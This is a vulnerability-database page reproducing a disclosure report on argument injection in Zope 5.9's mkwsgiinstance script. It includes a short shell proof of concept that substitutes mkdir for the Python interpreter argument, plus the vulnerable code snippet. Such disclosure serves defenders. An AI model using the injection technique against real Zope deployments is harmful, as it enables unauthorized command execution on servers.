Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtIlyase Dehy1337DAY-ID-39614
HistoryMay 15, 2024 - 12:00 a.m.

Zope 5.9 Command Injection Vulnerability

2024-05-1500:00:00
Ilyase Dehy
0day.today
122
zope
command injection
wsgi
vulnerability
remote code execution
security flaw
python interpreter
subprocess commands
information disclosure

7.2 High

AI Score

Confidence

Low

JSON
# Vulnerability Report

## Title: Command Argument Injection Vulnerability in Zope WSGI Instance Creation Script Leading to RCE

### Description:
A command Argument injection vulnerability has been identified in the Zope WSGI instance creation script used by the Zope web application server framework, which is maintained by the Zope Foundation. The script, mkwsgiinstance, facilitates the setup of new Zope WSGI application instances and involves specifying the Python interpreter among other parameters via command-line arguments. The flaw stems from insufficient validation of the Python interpreter path, allowing an attacker to execute arbitrary shell commands.

### Affected Product:
Product: Zope WSGI instance creation script (mkwsgiinstance)
Version: All versions prior to the most recent update

-Impact:
This vulnerability permits an attacker with local access to the server to execute arbitrary commands with the privileges of the user running the mkwsgiinstance script. The potential impacts include unauthorized information disclosure
### POC:

```bash

(env) root@lab:/opt/Zope# mkwsgiinstance -p "/usr/bin/mkdir" -d "/tmp/temp;"
Please choose a username and password for the initial user.
These will be the credentials you use to initially manage
your new Zope instance.

Username: d
Password: 
Verify password: 
(env) root@lab:/opt/Zope# ls /tmp
'temp;'
```

In this example, the attacker replaces the Python interpreter argument (-p) with the mkdir command, followed by an arbitrary directory path. Due to inadequate command-line argument sanitation, the script executes the mkdir command, thus illustrating arbitrary command execution.

### Vulnerable Code Snippet:

```python

if opt in ("-p", "--python"):
    python = os.path.abspath(os.path.expanduser(arg))
    if not os.path.exists(python) and os.path.isfile(python):
        usage(sys.stderr, "The Python interpreter does not exist.")
        sys.exit(2)
```

This code snippet fails to adequately validate the python variable that influences subprocess commands directly, enabling potential command injection when malicious inputs are utilized.

CVSS Calculated Vulnerability Score:
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

### Credits:

This vulnerability was disclosed by Aymane MAZGUITI / Ilyase Dehy.

Related

packetstorm 1
packetstorm
packetstorm
Zope 5.9 Command Injection
2024-05-15 00:00:00

7.2 High

AI Score

Confidence

Low

JSON
Related for 1337DAY-ID-39614
packetstorm1